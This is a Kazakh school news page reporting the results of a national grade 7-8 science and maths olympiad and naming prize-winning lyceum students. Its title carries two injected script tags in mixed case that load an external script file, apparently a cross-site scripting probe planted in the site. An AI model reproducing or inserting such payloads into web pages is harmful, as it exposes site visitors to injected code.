7-8 сынып оқушыларына арналған жаратылыстану-математикалық бағыттағы жалпы білім беретін пәндер бойынша республикалық олимпиадасының қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.09.2024

2024 жылғы 20-22 мамыр күндері Астана қаласында 7-8 сынып оқушыларына арналған жаратылыстану-математикалық бағыттағы жалпы білім беретін пәндер бойынша республикалық олимпиадасының қорытынды кезеңі өтті.

         Олимпиаданың мақсаты - оқушылардың жаратылыстану-математикалық бағыттағы пәндерді тереңдетіп оқытуға қызығушылығын арттыру, жоғары деңгейдегі олимпиадаларға жасөспірімдерді даярлау жүйесін жетілдіру және олимпиадалық резерв құру.

         Олимпиада 6 пән бойынша жалпы білім беретін бағдарламалар негізінде өткізілді: математика, физика, химия, биология, география, информатика.

         Олимпиадаға облыстық кезеңнің 13 жеңімпазы қатысты.

         Олимпиада нәтижесі бойынша:

         І-дәрежелі диплом иегерлері:

1. «География» пәні бойынша  Төлегенов Ерсултан - Көкшетау қаласы,"Білім-инновация" лицей-интернатының 8-сынып оқушысы;

2. «Физика» пәні бойынша  Куспаев Ибрагим - Көкшетау қаласы,"Білім-инновация" лицей-интернатының 7-сынып оқушысы;

3. «Информатика» пәні бойынша  Шаймерден Нұрәлі - Көкшетау қаласы,"Білім-инновация" лицей-интернатының 8-сынып оқушысы.

         Грамота иегерлері:

1. «География» пәні бойынша Серік Арғын - Көкшетау қаласы,"Білім-инновация" лицей-интернатының 7-сынып оқушысы;

2.«Физика» пәні бойынша Нұрғали Диас – Көкшетау қаласы, "Білім-инновация" лицей-интернатының 7-сынып оқушысы;

3.«Информатика» пәні бойынша  Мұғжан Дінмұхаммед - Көкшетау қаласы,"Білім-инновация" лицей-интернатының 8-сынып оқушысы.

​         Жас олимпиадашыларды құттықтаймыз және болашақ зияткерлік жарыстарда жаңа жеңістер мен табыстар тілейміз!!!

Просмотров: 1077


Пікір қосу



Деректерді қолтаңбаға қосу